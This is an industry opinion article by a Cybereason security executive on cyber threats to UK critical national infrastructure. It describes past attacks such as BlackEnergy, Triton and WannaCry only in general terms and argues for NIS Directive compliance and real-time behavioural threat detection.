Protecting the UK’s national infrastructure from cyber threats

The threat of a serious cyber security incident has become a major concern for most organisations after two years of an almost constant stream of high-profile attacks hitting household names. However, while these attacks are bad news for the affected companies and their customers, a much bigger threat comes in the form of attacks targeting critical national infrastructure, says Israel Barak at Cybereason.

The potential for a major attack on the UK infrastructure, such as the energy supply or the financial services sector, has grown significantly in recent times as both nation states and independent cybercriminals step up the volume and sophistication of their activity.

Indeed, in January, Ciaran Martin, Head of the National Cyber Security Centre (NCSC), warned in an interview that he believed it was a matter of “when, not if” for a “category one” attack, which would cripple key infrastructure. Martin added that he believed the UK would be lucky to make it out of the decade without at least one such incident.

Martin’s comments came after the NCSC announced in November 2017 that Russian hackers had orchestrated a number of attacks on UK targets, including the energy, media and telecoms sectors.

The UK has so far been fortunate the escape the wave of major attacks on national infrastructure that has swept the globe in recent years, with the energy sector as a major target.

The energy sector under attack

A watershed moment came in 2015 when attackers hit the Ukraine’s power grid – the first known cyber attack on an energy network. The attack used a malware known as BlackEnergy and resulted in 30 substations being shut off, with around 230,000 people being left without power for up to six hours. The attack took place during the Ukrainian-Russian conflict and is believed to be the work of an advanced persistent threat group working on behalf of Russia.

In one of the most recent examples, a major oil and gas company in the Middle East was hit with a malware called ‘Trisis’, also known as ‘Triton’. The malware was specially designed to target Schneider Electric’s Triconex safety instrumented system (SIS) and enables an attacker to force a plant shutdown, or even cause physical damage to a site. The incident was made more notable when Schneider Electric accidently published crucial code from the malware on GitHub, potentially enabling criminals to replicate the attack.

Attacks on national infrastructure have become much easier to execute as the software and skills needed for high-level attacks become more readily available. BlackEnergy, Trisis, and other previous attacks such as the infamous Stuxnet worm, have all been tailored to attack specific systems by extremely skilled and knowledgeable hackers. However, the burgeoning cybercriminal economy on the darknet means that such tools, as well as the means to produce them, are increasingly widely available for purchase.

Advanced tools are becoming more available

A good example of this new paradigm came with last year’s WannaCry and NotPetya ransomware attacks, both of which were designed using a vulnerability called EternalBlue, which had been stolen from a cache of NSA tools and publicly leaked online.

The availability of high-grade malware and vulnerabilities means that attacks on national infrastructure are no longer limited to elite hackers with the resources of a nation state. Rather, any reasonably competent individual with a laptop can acquire the means to launch a devastating attack on the nation of their choice.

The good news is that attacks on infrastructure are much less enticing than ransomware campaigns or hacks targeting corporate and consumer data. Most criminals are motivated by personal gain and these kinds of attacks offer a clear payoff, whereas taking down a power grid or disabling a plant has no immediate monetary advantage. However, the fact remains that the potential is out there for any would-be terrorist or anarchist to take advantage of.

How can critical infrastructure be defended?

As with most other nations around the world, the UK has invested heavily in protecting the classified networks used by governmental departments, as well as other vital instruments of national security such as weapons systems.

However, when it comes to the critical national infrastructure, security is usually handled directly by individual private organisations. This means that poor practice by an organisation or even a single blind spot in security could lead to a cyber incident with a huge impact on the UK’s economy and the safety of its citizens.

To compensate for this security weakness, it is essential that the government takes a strong hand in regulating the security of all high priority targets such as energy, transport and finance.

Encouragingly, the government recently published new guidelines for companies to comply with the EU Network and Information Systems (NIS) Directive, which will enter into UK law in May 2018. Organisations deemed ‘Operators of Essential Services’, which includes most energy, water, transport and health providers, will need to meet the terms of the Directive when it comes into force. The government also announced fines of £17M for firms that are found to have poor security practices, and regulators will be able to inspect companies to assess their cyber security readiness.

The NIS Directive sets out four core security objectives that organisations need to meet: managing security risk, protecting against cyber-attacks, detecting events, and minimising the impact of incidents. Within each of these objectives are many different tasks that will greatly help to reduce the risk of a serious incident.

However, complete security assurance is impossible in the modern IT environment. There are thousands of innovative hackers constantly searching for vulnerabilities that can be exploited to launch an attack. Each of them only needs to be successful once, whereas the organisations in their crosshairs must defend themselves again and again. Indeed, even the NCSC’s Ciaran Martin admits that total protection is impossible, stating that some attacks will always get through, in which case cauterising the damage becomes the priority.

The importance of real time detection

One of the most valuable security capabilities for the organisations that form the UK’s critical national infrastructure is the ability to detect threats inside their network in real time. This will enable them to respond quickly and improves the chances of neutralising an attack before it can be escalated to exfiltrate critical data or damage essential operational systems.

An important part of real-time detection is moving from signature-based security to behavioural analysis. Most traditional security measures, such as firewalls and antivirus, function by identifying known quantities that indicate an attack, such as particular code from previously identified malware. A major shortcoming here is that the attack is more likely to be to be fully under way by the time these signs are visible. Further, most advanced persistent threats (APTs) use previously unseen malware, or attack methods specifically designed not to trigger signature-based detection, such as exploiting scripting programs like PowerShell.

To counter these techniques, organisations need to adopt security measures that use behavioural analysis to spot signs of suspicious behaviour across their IT network. Being able to detect these subtle signs in real time will make it possible to spot an attack before it can truly begin.

By both taking on these more advanced measures and following the essential guidance set out by the NIS Directive, the private organisations responsible for the UK’s critical national infrastructure can ensure they are in the best possible position to prevent cyber-attacks from disrupting their essential services.

Article submitted by Israel Barak, CISO at Cybereason

If you would like to read more articles like this then please click here.